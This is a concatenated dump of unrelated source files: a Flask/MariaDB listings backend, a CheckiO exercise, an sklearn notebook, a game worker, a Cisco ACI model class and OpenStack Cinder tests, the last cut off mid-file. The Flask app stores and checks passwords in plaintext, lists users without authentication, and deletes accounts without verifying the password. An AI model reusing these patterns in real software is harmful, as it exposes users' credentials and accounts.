c46422aa62a585b2fef203ad5395901b118ea3da | d1cd97730d5ed4f7bec147d237cfe9ac9b2f6134 | /app.py | 9ef7c1d9e2022174e85c07cdc30742e823d87014 | [] | no_license | tsungic/MVP-backend | b5354c6fb13bfdfbc33ad7d85b98b195c90a1be1 | 2c371f4a10e36799c8c26cac933b55caff86ff72 | refs/heads/master | 2023-04-01T20:35:46.341005 | 2021-04-14T22:17:31 | 2021-04-14T22:17:31 | 349,769,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,489 | py | from flask import Flask, request, Response
from flask_cors import CORS
import dbcreds
import mariadb
import json
import secrets
app = Flask(__name__)
CORS(app)
@app.route("/api/users", methods=["GET","POST","PATCH","DELETE"])
def users():
if request.method =="GET":
user_id = request.args.get("userId")
conn = None
cursor = None
users_data = None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
if user_id:
cursor.execute("SELECT * FROM users where id =?", [user_id])
users_data = cursor.fetchall()
else:
cursor.execute("SELECT * FROM users")
users_data = cursor.fetchall()
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if users_data or users_data ==[]:
users_info =[]
for user in users_data:
user_dic={
"userId": user[0],
"email": user [1],
"name": user [3]
}
users_info.append(user_dic)
return Response(json.dumps(users_info, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method =="POST":
conn = None
cursor = None
user_info = request.json
name = user_info.get("name")
password = user_info.get("password")
email = user_info.get("email")
user_session_id = None
if email!=None and email !="" and name!=None and name !="" and password!=None and password !="" :
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("INSERT INTO users (email, password, name) VALUES (?,?,?)", [email, password, name])
conn.commit()
user_id = cursor.lastrowid
login_token= secrets.token_urlsafe(20)
cursor.execute("INSERT INTO user_session (user_id, loginToken) VALUES (?,?)", [user_id, login_token])
conn.commit()
user_session_id = cursor.lastrowid
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if user_session_id != None:
user_dic={
"userId": user_id,
"email": email,
"name": name,
"loginToken": login_token
}
return Response(json.dumps(user_dic, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method == "PATCH":
user_info = request.json
conn = None
cursor = None
name = user_info.get("name")
password = user_info.get("password")
email = user_info.get("email")
login_token = user_info.get("loginToken")
user= None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
if email != None and email !="" and login_token != None and login_token !="":
#get userid based on login token
cursor.execute("SELECT user_id FROM user_session where loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
#can update user table based on user id
cursor.execute("UPDATE users SET email = ? where id = ?", [email, user_id])
if name != None and name !="" and login_token != None and login_token !="":
cursor.execute("SELECT user_id FROM user_session where loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
cursor.execute("UPDATE users SET name = ? where id = ?", [name, user_id])
if password != None and password !="" and login_token != None and login_token !="":
cursor.execute("SELECT user_id FROM user_session where loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
cursor.execute("UPDATE users SET password = ? where id = ?", [password, user_id])
conn.commit()
row=cursor.rowcount
cursor.execute("SELECT * FROM users where id = ?", [user_id])
user = cursor.fetchone()
except Exception as e:
print (e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if user != None:
user_dic={
"userId": user[0],
"email": user [1],
"name": user[3]
}
return Response(json.dumps(user_dic, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method == "DELETE":
user_info = request.json
conn = None
cursor = None
password = user_info.get("password")
login_token = user_info.get("loginToken")
user= None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
if password != None and password !="" and login_token != None and login_token !="":
cursor.execute("DELETE FROM users WHERE id = ?",[user_id])
conn.commit()
row=cursor.rowcount
except Exception as e:
print (e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if user == None:
return Response("Delete successful", mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
@app.route("/api/login", methods=["POST", "DELETE"])
def login():
if request.method == "POST":
conn = None
cursor = None
users_data = None
user_info = request.json
password = user_info.get("password")
email = user_info.get("email")
login_rows = None
user_data = None
if email !="" and email !=None and password !="" and password !=None:
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("SELECT * FROM users where email =? AND password =?", [email, password])
user_data = cursor.fetchone()
rows = cursor.rowcount
#to login need user id, can get from fetch one(which hold all user data)
if (user_data != None):
#user id is first row in db-0
user_id = user_data[0]
login_token = secrets.token_urlsafe(20)
cursor.execute("INSERT INTO user_session (user_id, loginToken) VALUES (?,?)",[user_id, login_token])
conn.commit()
#login_rows check if insertion is done correct
login_rows = cursor.rowcount
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
#determine if login is working or not
if(login_rows != None):
#return user date
user_dic = {
"userId": user_data[0],
"email": user_data [1],
"name": user_data[3],
"loginToken": login_token
}
return Response(json.dumps(user_dic, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method =="DELETE":
login_token = request.json.get("loginToken")
rows = None
if login_token != None and login_token !="":
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("DELETE FROM user_session where loginToken = ?", [login_token])
conn.commit()
rows = cursor.rowcount
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if (rows == 1):
return Response("logout success", mimetype="text/html", status =204)
else:
return Response ("logout failed", mimetype="text/html", status =404)
@app.route("/api/place", methods=["GET","POST","PATCH","DELETE"])
def place():
if request.method == "GET":
user_id = request.args.get("userId")
conn = None
cursor = None
place_data = None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
if user_id:
cursor.execute("SELECT * FROM users u INNER JOIN place p ON u.id = p.user_id WHERE u.id = ?", [user_id])
t_data = cursor.fetchall()
else:
cursor.execute("SELECT * FROM users u INNER JOIN place p ON u.id = p.user_id")
place_data = cursor.fetchall()
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if place_data or place_data ==[]:
place_info =[]
#create for loop
for place in place_data:
place_dic={
"placeId": place[4],
"userId": place [0],
"name": place [5],
"accomodates": place[6],
"bathrooms": place [7],
"bedrooms": place [8],
"beds": place [9],
"images": place [10],
"price": place [13],
"propertyType": place [14],
"roomType": place[15]
}
place_info.append(place_dic)
return Response(json.dumps(place_info, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method == "POST":
login_token = request.json.get("loginToken")
name = request.json.get("name")
conn = None
cursor = None
place = None
user_id = None
place_id = None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?", [login_token])
user_id = cursor.fetchone()[0]
cursor.execute("INSERT INTO place(user_id, name) VALUES (?,?)", [user_id, name])
conn.commit()
place_id = cursor.lastrowid
cursor.execute("SELECT * FROM users u INNER JOIN place p ON u.id = p.user_id where p.id = ?", [place_id])
place = cursor.fetchone()
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if place or place ==[]:
place_dic={
"placeId": place[4],
"userId": place [0],
"name": place [5],
"accomodates": place[6],
"bathrooms": place [7],
"bedrooms": place [8],
"beds": place [9],
"images": place [10],
"price": place [13],
"propertyType": place [14],
"roomType": place[15]
}
return Response(json.dumps(place_dic, default = str), mimetype="application/json", status=201)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method == "PATCH":
login_token = request.json.get("loginToken")
place_id = request.json.get("placeId")
name = request.json.get("name")
conn = None
cursor = None
user_id = None
rows= None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?", [login_token])
user_id = cursor.fetchone()[0]
cursor.execute("UPDATE place SET name = ? WHERE id=? AND user_id =?", [name, place_id, user_id])
conn.commit()
rows = cursor.rowcount
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if rows != None:
response_dic={
"placeId": place_id,
"name": name,
}
return Response(json.dumps(response_dic, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method == "DELETE":
login_token = request.json.get("loginToken")
place_id = request.json.get("placeId")
conn = None
cursor = None
user_id = None
rows= None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?", [login_token])
user_id = cursor.fetchone()[0]
cursor.execute("DELETE FROM place WHERE id=? AND user_id =?", [place_id, user_id])
conn.commit()
rows = cursor.rowcount
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if rows != None:
return Response("Delete success", mimetype="html/text", status=204)
else:
return Response("failure", mimetype="html/text", status=400)
| [
"[email protected]"
] | |
81270c4b09a1d3528f7e7da50545fdb98d9f0426 | 2ade7afe274e3f6252bcfc38c17639fc31379002 | /checkio.org/Elementary/popular_words.py | fc9c1bcbd795b9b52e02106d5b35a8974fedf37e | [] | no_license | dunaldo/checkio-solutions | 78c6922efb6b7f321476be1e15d56beafe5efc8b | a8ed7ac072d43d185f95149473f0e529d41e1d6c | refs/heads/master | 2020-03-29T09:23:43.521483 | 2019-02-07T20:28:40 | 2019-02-07T20:28:40 | 149,756,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | from collections import Counter
def popular_words(text, words):
# your code here
text = dict(Counter(text.replace(',', '').lower().replace('.', '').split()))
newtext = text.fromkeys(words, 0)
for key, value in text.items():
if key in newtext:
newtext[key] = text[key]
else:
continue
return newtext
if __name__ == '__main__':
print("Example:")
print(popular_words('''
When I was One,
I had just begun.
When I was Two,
I was nearly new.
''', ['i', 'was', 'three']))
# # These "asserts" are used for self-checking and not for an auto-testing
# assert popular_words('''
# When I was One,
# I had just begun.
# When I was Two,
# I was nearly new.
# ''', ['i', 'was', 'three']) == {
# 'i': 4,
# 'was': 3,
# 'three': 0
# }
# print("Coding complete? Click 'Check' to earn cool rewards!")
| [
"[email protected]"
] | |
0661e0edba59217cb141f3c37b121546ca3d25c9 | 80fd53a27d0c4b4053671a24678aeb67e7c67d04 | /Digit_recognition_sci_kit_learn_Test.py | 663d288c8a26a91d2bb193c7cec6ed1fd83bd111 | [] | no_license | S-shubham/Sci_Kit_learn- | 39b065d03b99b52823b9d0aa69ca9406ac6d322a | 9d1a98ee79b2913be5f8606175b58dff0dd4b2ea | refs/heads/master | 2020-04-03T05:46:06.644526 | 2018-11-26T07:49:54 | 2018-11-26T07:49:54 | 155,055,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
2+3
# In[3]:
from sklearn import datasets as ds
# In[5]:
digit=ds.load_digits()
# In[6]:
from sklearn import svm
# In[7]:
clf=svm.SVC(gamma=0.001,C=100.)
# In[10]:
clf.fit(digit.data[:-1],digit.target[:-1])
# In[12]:
clf.predict(digit.data[-1:])
# In[14]:
digit.target[-1:]
# In[ ]:
| [
"[email protected]"
] | |
57adbfd2865b7cf8540897ff6ca3685bbaf4dfb0 | 164457b943d0b426e9a5e2eb57779e4e37f2d1bb | /the_tale/accounts/workers/accounts_manager.py | 84d4482f67e8a0b8ffab01b81c7cb415dffd6c34 | [
"BSD-2-Clause-Views"
] | permissive | lshestov/the-tale | 64334fd99a442ad736d9e8a38e8f0fb52d0ebab6 | 6229edfec6420307975269be9926c68ecdefb930 | refs/heads/master | 2021-01-18T08:38:44.147294 | 2015-10-27T18:43:10 | 2015-10-27T18:43:10 | 50,228,827 | 0 | 0 | null | 2016-01-23T07:38:54 | 2016-01-23T07:38:54 | null | UTF-8 | Python | false | false | 3,166 | py | # coding: utf-8
import time
import datetime
from dext.settings import settings
from the_tale.common.utils.workers import BaseWorker
from the_tale.common import postponed_tasks
from the_tale.accounts.prototypes import AccountPrototype, RandomPremiumRequestPrototype
from the_tale.accounts.conf import accounts_settings
class Worker(BaseWorker):
GET_CMD_TIMEOUT = 60
def clean_queues(self):
super(Worker, self).clean_queues()
self.stop_queue.queue.purge()
def initialize(self):
self.initialized = True
postponed_tasks.PostponedTaskPrototype.reset_all()
self.logger.info('ACCOUNT_MANAGER INITIALIZED')
def process_no_cmd(self):
# is send premium expired notifications needed
if (time.time() - float(settings.get(accounts_settings.SETTINGS_PREV_PREIMIUM_EXPIRED_NOTIFICATION_RUN_TIME_KEY, 0)) > 23.5*60*60 and
accounts_settings.PREMIUM_EXPIRED_NOTIFICATION_RUN_TIME <= datetime.datetime.now().hour <= accounts_settings.PREMIUM_EXPIRED_NOTIFICATION_RUN_TIME+1):
settings[accounts_settings.SETTINGS_PREV_PREIMIUM_EXPIRED_NOTIFICATION_RUN_TIME_KEY] = str(time.time())
self.run_send_premium_expired_notifications()
return
self.run_random_premium_requests_processing()
def run_send_premium_expired_notifications(self):
AccountPrototype.send_premium_expired_notifications()
def run_random_premium_requests_processing(self):
while True:
request = RandomPremiumRequestPrototype.get_unprocessed()
if request is None:
return
self.logger.info('process random premium request %d' % request.id)
if not request.process():
self.logger.info('request %d not processed' % request.id)
return
else:
self.logger.info('request %d processed' % request.id)
def cmd_task(self, task_id):
return self.send_cmd('task', {'task_id': task_id})
def process_task(self, task_id):
task = postponed_tasks.PostponedTaskPrototype.get_by_id(task_id)
task.process(self.logger)
task.do_postsave_actions()
def cmd_run_account_method(self, account_id, method_name, data):
return self.send_cmd('run_account_method', {'account_id': account_id,
'method_name': method_name,
'data': data})
def process_run_account_method(self, account_id, method_name, data):
if account_id is not None:
account = AccountPrototype.get_by_id(account_id)
getattr(account, method_name)(**data)
account.save()
else:
# here we can process classmethods, if they appear in future
pass
def cmd_stop(self):
return self.send_cmd('stop')
def process_stop(self):
self.initialized = False
self.stop_required = True
self.stop_queue.put({'code': 'stopped', 'worker': 'accounts_manager'}, serializer='json', compression=None)
self.logger.info('ACCOUNTS MANAGER STOPPED')
| [
"[email protected]"
] | |
ac47410c081854dcc9bc0251f7925ae5e152c61f | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/fv/poddhcpserverinfo.py | 578744b8cd584e1c2bc24ce6e7cb39c73bd5bc04 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 7,213 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class PodDhcpServerInfo(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = ClassMeta("cobra.model.fv.PodDhcpServerInfo")
meta.moClassName = "fvPodDhcpServerInfo"
meta.rnFormat = "podDhcpServerInfo-%(nodeId)s"
meta.category = MoCategory.REGULAR
meta.label = "Dhcp Server info of the current POD"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Inst")
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.fv.PodConnPDef")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.rnPrefixes = [
('podDhcpServerInfo-', True),
]
prop = PropMeta("str", "PodDhcpServerDn", "PodDhcpServerDn", 47391, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("PodDhcpServerDn", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dhcpIssues", "dhcpIssues", 47392, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("incorrect-pod-dhcp-server-configuration", "nodeid-of-fabricpoddhcpserver-configured-is-not-a-vtor", 1)
prop._addConstant("none", "none", 0)
meta.props.add("dhcpIssues", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "nodeId", "nodeId", 44472, PropCategory.REGULAR)
prop.label = "node id of Dhcp server"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.range = [(1, 16000)]
prop.defaultValue = 1
prop.defaultValueStr = "1"
meta.props.add("nodeId", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "serverType", "serverType", 44473, PropCategory.REGULAR)
prop.label = "Dhcp server Type Primary/Secondary"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("primary", "primary", 1)
prop._addConstant("secondary", "secondary", 2)
prop._addConstant("unspecified", "unspecified", 0)
meta.props.add("serverType", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "nodeId"))
def __init__(self, parentMoOrDn, nodeId, markDirty=True, **creationProps):
namingVals = [nodeId]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
7ad34a71cf548ff1303f903e8c1a5ba7ad27e6e8 | 631b074ba6b901ba5fb709f8e24acb84a596e777 | /cinder/tests/api/openstack/volume/test_volumes.py | 9563989a91bfa3d21b06cacf38d01659d5bf1120 | [
"Apache-2.0"
] | permissive | matiu2/cinder | 5ee188a834eea06883103ab97cee50a9ee3a21bb | 1c52fb3041df5661756246705942c60b4b1448d5 | refs/heads/master | 2021-01-18T13:54:34.159533 | 2012-05-04T04:45:20 | 2012-05-04T04:45:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,490 | py | # Copyright 2013 Josh Durgin
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from lxml import etree
import webob
from cinder.api.openstack.volume import volumes
from cinder import flags
from cinder import test
from cinder.tests.api.openstack import fakes
from cinder.volume import api as volume_api
FLAGS = flags.FLAGS
NS = '{http://docs.openstack.org/volume/api/v1}'
class VolumeApiTest(test.TestCase):
def setUp(self):
super(VolumeApiTest, self).setUp()
self.controller = volumes.VolumeController()
self.stubs.Set(volume_api.API, 'get_all', fakes.stub_volume_get_all)
self.stubs.Set(volume_api.API, 'get', fakes.stub_volume_get)
self.stubs.Set(volume_api.API, 'delete', fakes.stub_volume_delete)
def test_volume_create(self):
self.stubs.Set(volume_api.API, "create", fakes.stub_volume_create)
vol = {"size": 100,
"display_name": "Volume Test Name",
"display_description": "Volume Test Desc",
"availability_zone": "zone1:host1"}
body = {"volume": vol}
req = fakes.HTTPRequest.blank('/v1/volumes')
res_dict = self.controller.create(req, body)
expected = {'volume': {'status': 'fakestatus',
'display_description': 'Volume Test Desc',
'availability_zone': 'zone1:host1',
'display_name': 'Volume Test Name',
'attachments': [{'device': '/',
'server_id': 'fakeuuid',
'id': '1',
'volume_id': '1'}],
'volume_type': 'vol_type_name',
'snapshot_id': None,
'metadata': {},
'id': '1',
'created_at': datetime.datetime(1, 1, 1,
1, 1, 1),
'size': 100}}
self.assertEqual(res_dict, expected)
def test_volume_create_no_body(self):
body = {}
req = fakes.HTTPRequest.blank('/v1/volumes')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create,
req,
body)
def test_volume_list(self):
req = fakes.HTTPRequest.blank('/v1/volumes')
res_dict = self.controller.index(req)
expected = {'volumes': [{'status': 'fakestatus',
'display_description': 'displaydesc',
'availability_zone': 'fakeaz',
'display_name': 'displayname',
'attachments': [{'device': '/',
'server_id': 'fakeuuid',
'id': '1',
'volume_id': '1'}],
'volume_type': 'vol_type_name',
'snapshot_id': None,
'metadata': {},
'id': '1',
'created_at': datetime.datetime(1, 1, 1,
1, 1, 1),
'size': 1}]}
self.assertEqual(res_dict, expected)
def test_volume_list_detail(self):
req = fakes.HTTPRequest.blank('/v1/volumes/detail')
res_dict = self.controller.index(req)
expected = {'volumes': [{'status': 'fakestatus',
'display_description': 'displaydesc',
'availability_zone': 'fakeaz',
'display_name': 'displayname',
'attachments': [{'device': '/',
'server_id': 'fakeuuid',
'id': '1',
'volume_id': '1'}],
'volume_type': 'vol_type_name',
'snapshot_id': None,
'metadata': {},
'id': '1',
'created_at': datetime.datetime(1, 1, 1,
1, 1, 1),
'size': 1}]}
self.assertEqual(res_dict, expected)
def test_volume_show(self):
req = fakes.HTTPRequest.blank('/v1/volumes/1')
res_dict = self.controller.show(req, 1)
expected = {'volume': {'status': 'fakestatus',
'display_description': 'displaydesc',
'availability_zone': 'fakeaz',
'display_name': 'displayname',
'attachments': [{'device': '/',
'server_id': 'fakeuuid',
'id': '1',
'volume_id': '1'}],
'volume_type': 'vol_type_name',
'snapshot_id': None,
'metadata': {},
'id': '1',
'created_at': datetime.datetime(1, 1, 1,
1, 1, 1),
'size': 1}}
self.assertEqual(res_dict, expected)
def test_volume_show_no_attachments(self):
def stub_volume_get(self, context, volume_id):
return fakes.stub_volume(volume_id, attach_status='detached')
self.stubs.Set(volume_api.API, 'get', stub_volume_get)
req = fakes.HTTPRequest.blank('/v1/volumes/1')
res_dict = self.controller.show(req, 1)
expected = {'volume': {'status': 'fakestatus',
'display_description': 'displaydesc',
'availability_zone': 'fakeaz',
'display_name': 'displayname',
'attachments': [],
'volume_type': 'vol_type_name',
'snapshot_id': None,
'metadata': {},
'id': '1',
'created_at': datetime.datetime(1, 1, 1,
1, 1, 1),
'size': 1}}
self.assertEqual(res_dict, expected)
def test_volume_show_no_volume(self):
self.stubs.Set(volume_api.API, "get", fakes.stub_volume_get_notfound)
req = fakes.HTTPRequest.blank('/v1/volumes/1')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
req,
1)
def test_volume_delete(self):
req = fakes.HTTPRequest.blank('/v1/volumes/1')
resp = self.controller.delete(req, 1)
self.assertEqual(resp.status_int, 202)
def test_volume_delete_no_volume(self):
self.stubs.Set(volume_api.API, "get", fakes.stub_volume_get_notfound)
req = fakes.HTTPRequest.blank('/v1/volumes/1')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete,
req,
1)
class VolumeSerializerTest(test.TestCase):
def _verify_volume_attachment(self, attach, tree):
for attr in ('id', 'volume_id', 'server_id', 'device'):
self.assertEqual(str(attach[attr]), tree.get(attr))
def _verify_volume(self, vol, tree):
self.assertEqual(tree.tag, NS + 'volume')
for attr in ('id', 'status', 'size', 'availability_zone', 'created_at',
'display_name', 'display_description', 'volume_type',
'snapshot_id'):
self.assertEqual(str(vol[attr]), tree.get(attr))
for child in tree:
print child.tag
self.assertTrue(child.tag in (NS + 'attachments', NS + 'metadata'))
if child.tag == 'attachments':
self.assertEqual(1, len(child))
self.assertEqual('attachment', child[0].tag)
self._verify_volume_attachment(vol['attachments'][0], child[0])
elif child.tag == 'metadata':
not_seen = set(vol['metadata'].keys())
for gr_child in child:
self.assertTrue(gr_child.tag in not_seen)
self.assertEqual(str(vol['metadata'][gr_child.tag]),
gr_child.text)
not_seen.remove(gr_child.tag)
self.assertEqual(0, len(not_seen))
def test_volume_show_create_serializer(self):
serializer = volumes.VolumeTemplate()
raw_volume = dict(
id='vol_id',
status='vol_status',
size=1024,
availability_zone='vol_availability',
created_at=datetime.datetime.now(),
attachments=[dict(
id='vol_id',
volume_id='vol_id',
server_id='instance_uuid',
device='/foo')],
display_name='vol_name',
display_description='vol_desc',
volume_type='vol_type',
snapshot_id='snap_id',
metadata=dict(
foo='bar',
baz='quux',
),
)
text = serializer.serialize(dict(volume=raw_volume))
print text
tree = etree.fromstring(text)
self._verify_volume(raw_volume, tree)
def test_volume_index_detail_serializer(self):
serializer = volumes.VolumesTemplate()
raw_volumes = [dict(
id='vol1_id',
status='vol1_status',
size=1024,
availability_zone='vol1_availability',
created_at=datetime.datetime.now(),
attachments=[dict(
id='vol1_id',
volume_id='vol1_id',
server_id='instance_uuid',
